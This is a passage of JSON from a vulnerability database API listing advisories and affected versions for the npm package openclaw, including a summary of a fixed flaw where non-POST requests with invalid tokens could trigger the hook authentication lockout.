ID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VC
ID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VC
ID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VC
ID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32971","GHSA-rw39-5899-8mxp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qr66-xgea-tufh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50767?format=json","vulnerability_id":"VCID-qyyn-bw9t-r7c4","summary":"OpenClaw's hooks count non-POST requests toward auth lockout\nOpenClaw's hooks HTTP handler counted hook authentication failures before rejecting unsupported HTTP methods. 
An unauthenticated client could send repeated non-`POST` requests (for example `GET`) with an invalid token to consume the hook auth failure budget and trigger the temporary lockout window for that client key.\n\nThe fix moves the hook method gate ahead of auth-failure accounting so unsupported methods return `405 Method Not Allowed` without incrementing the hook auth limiter.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/44820dceadac65ac7c0ce8fc0ffba8c2bd9fae89","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/44820dceadac65ac7c0ce8fc0ffba8c2bd9fae89"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-6rmx-gvvg-vh6j","reference_id":"GHSA-6rmx-gvvg-vh6j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6rmx-gvvg-vh6j"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6rmx-gvvg-vh6j","reference_id":"GHSA-6rmx-gvvg-vh6j","reference_type":"","scores":[{"value":"5.3
","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6rmx-gvvg-vh6j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vul
nerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vul
nerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vul
nerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vul
nerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vul
nerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vul
